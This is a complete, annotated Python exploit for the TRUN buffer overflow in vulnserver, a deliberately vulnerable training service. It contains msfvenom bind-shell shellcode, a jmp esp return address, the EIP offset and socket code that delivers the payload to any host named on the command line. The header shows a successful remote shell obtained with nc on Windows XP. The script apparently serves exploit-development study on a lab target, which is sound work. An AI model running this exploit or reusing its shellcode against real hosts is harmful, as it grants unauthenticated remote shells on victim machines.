#!/usr/bin/python
#
# November 2017 | github.com/rafaveira3
#
# Exploit vulnserver.exe - TRUN - Buffer Overflow
#
# How I tested it:
# - Windows XP SP2.
# - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE)
# - http://sites.google.com/site/lupingreycorner/vulnserver.zip
#
#
# Development Process:
# -
#
# PoC:
# Windows XP:
# - Double Click vulnserver.exe
#
# Kali:
# root@kali:~# python exploit-TRUN.py
# root@kali:~# nc -nv 10.10.0.20 443
# (UNKNOWN) [10.10.0.20] 443 (https) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\rafael\Desktop\WORK\vulnserver>
#
# Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems.
# Accessing a computer system or network without authorization or explicit permission is illegal.
#
#
import socket
import os
import sys
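# Return address: a "jmp esp" gadget at 0x625011af in essfunc.dll (the DLL
# shipped with vulnserver), written little-endian.  For this to be reliable
# the module must load at a fixed base (no rebase/ASLR) - presumably why it
# was chosen; confirm in the debugger before reuse.
ret = b"\xaf\x11\x50\x62"
# Small NOP sled in front of the shellcode; execution is expected to land
# somewhere in here after the jmp esp.
nops = b"\x90" * 10
# msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f python -v shellcode
# The literal pasted below is 355 bytes (the original header said 356).
# Only \x00 was excluded as a bad character.
# NOTE(security): this is a *bind* shell.  Once it runs, anyone who can reach
# TCP/443 on the target gets a shell as the vulnserver user with no
# authentication.  Use only on an isolated lab network.
shellcode = b""
shellcode += b"\xd9\xc7\xbf\x5a\x26\x0a\x71\xd9\x74\x24\xf4\x5a"
shellcode += b"\x31\xc9\xb1\x53\x31\x7a\x17\x83\xea\xfc\x03\x20"
shellcode += b"\x35\xe8\x84\x28\xd1\x6e\x66\xd0\x22\x0f\xee\x35"
shellcode += b"\x13\x0f\x94\x3e\x04\xbf\xde\x12\xa9\x34\xb2\x86"
shellcode += b"\x3a\x38\x1b\xa9\x8b\xf7\x7d\x84\x0c\xab\xbe\x87"
shellcode += b"\x8e\xb6\x92\x67\xae\x78\xe7\x66\xf7\x65\x0a\x3a"
shellcode += b"\xa0\xe2\xb9\xaa\xc5\xbf\x01\x41\x95\x2e\x02\xb6"
shellcode += b"\x6e\x50\x23\x69\xe4\x0b\xe3\x88\x29\x20\xaa\x92"
shellcode += b"\x2e\x0d\x64\x29\x84\xf9\x77\xfb\xd4\x02\xdb\xc2"
shellcode += b"\xd8\xf0\x25\x03\xde\xea\x53\x7d\x1c\x96\x63\xba"
shellcode += b"\x5e\x4c\xe1\x58\xf8\x07\x51\x84\xf8\xc4\x04\x4f"
shellcode += b"\xf6\xa1\x43\x17\x1b\x37\x87\x2c\x27\xbc\x26\xe2"
shellcode += b"\xa1\x86\x0c\x26\xe9\x5d\x2c\x7f\x57\x33\x51\x9f"
shellcode += b"\x38\xec\xf7\xd4\xd5\xf9\x85\xb7\xb1\xce\xa7\x47"
shellcode += b"\x42\x59\xbf\x34\x70\xc6\x6b\xd2\x38\x8f\xb5\x25"
shellcode += b"\x3e\xba\x02\xb9\xc1\x45\x73\x90\x05\x11\x23\x8a"
shellcode += b"\xac\x1a\xa8\x4a\x50\xcf\x45\x42\xf7\xa0\x7b\xaf"
shellcode += b"\x47\x11\x3c\x1f\x20\x7b\xb3\x40\x50\x84\x19\xe9"
shellcode += b"\xf9\x79\xa2\x14\x41\xf4\x44\x7c\xa5\x51\xde\xe8"
shellcode += b"\x07\x86\xd7\x8f\x78\xec\x4f\x27\x30\xe6\x48\x48"
shellcode += b"\xc1\x2c\xff\xde\x4a\x23\x3b\xff\x4c\x6e\x6b\x68"
shellcode += b"\xda\xe4\xfa\xdb\x7a\xf8\xd6\x8b\x1f\x6b\xbd\x4b"
shellcode += b"\x69\x90\x6a\x1c\x3e\x66\x63\xc8\xd2\xd1\xdd\xee"
shellcode += b"\x2e\x87\x26\xaa\xf4\x74\xa8\x33\x78\xc0\x8e\x23"
shellcode += b"\x44\xc9\x8a\x17\x18\x9c\x44\xc1\xde\x76\x27\xbb"
shellcode += b"\x88\x25\xe1\x2b\x4c\x06\x32\x2d\x51\x43\xc4\xd1"
shellcode += b"\xe0\x3a\x91\xee\xcd\xaa\x15\x97\x33\x4b\xd9\x42"
shellcode += b"\xf0\x7b\x90\xce\x51\x14\x7d\x9b\xe3\x79\x7e\x76"
shellcode += b"\x27\x84\xfd\x72\xd8\x73\x1d\xf7\xdd\x38\x99\xe4"
shellcode += b"\xaf\x51\x4c\x0a\x03\x51\x45"

# Overflow buffer layout (always 3000 bytes, independent of shellcode size):
#   'A' * 2003  -> filler up to the saved return address (EIP offset; presumably
#                  found with pattern_create/pattern_offset - not shown here)
#   ret         -> overwrites EIP with the jmp esp gadget
#   nops        -> sled; assumes ESP points at the bytes right after ret
#   shellcode   -> bind shell
#   'C' padding -> keeps the total length fixed at 2003 + 4 + 993
# Everything is built as bytes (not str) so the payload survives Python 3,
# where a str would be re-encoded and bytes >= 0x80 corrupted.
EIP_OFFSET = 2003
TAIL_LEN = 993  # bytes available after the return address
if len(nops) + len(shellcode) > TAIL_LEN:
    # A negative repeat count would silently produce no padding and a
    # longer-than-expected request; fail loudly instead.
    raise ValueError("shellcode too large for the %d-byte tail" % TAIL_LEN)
padding = b"C" * (TAIL_LEN - len(shellcode) - len(nops))
evil = b"A" * EIP_OFFSET + ret + nops + shellcode + padding
# TRUN is the vulnserver command whose argument overflows; "/.:/" is the
# prefix the handler expects before the attacker-controlled buffer.
data = b"TRUN /.:/" + evil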
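# Target host/port: default to the lab box from the header, but accept
# `python exploit-TRUN.py <host> [port]` so the script need not be edited
# per target.
target_host = sys.argv[1] if len(sys.argv) > 1 else "10.10.0.20"
target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 9999

# One-shot TCP delivery of the TRUN request.  sendall() rather than send()
# so a short write cannot silently truncate the payload (send() may return
# having written fewer bytes than requested).  try/finally instead of a
# `with` block keeps Python 2 compatibility, where sockets are not context
# managers; the socket is closed even if connect()/sendall() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    expl.connect((target_host, target_port))
    expl.sendall(data)
finally:
    expl.close()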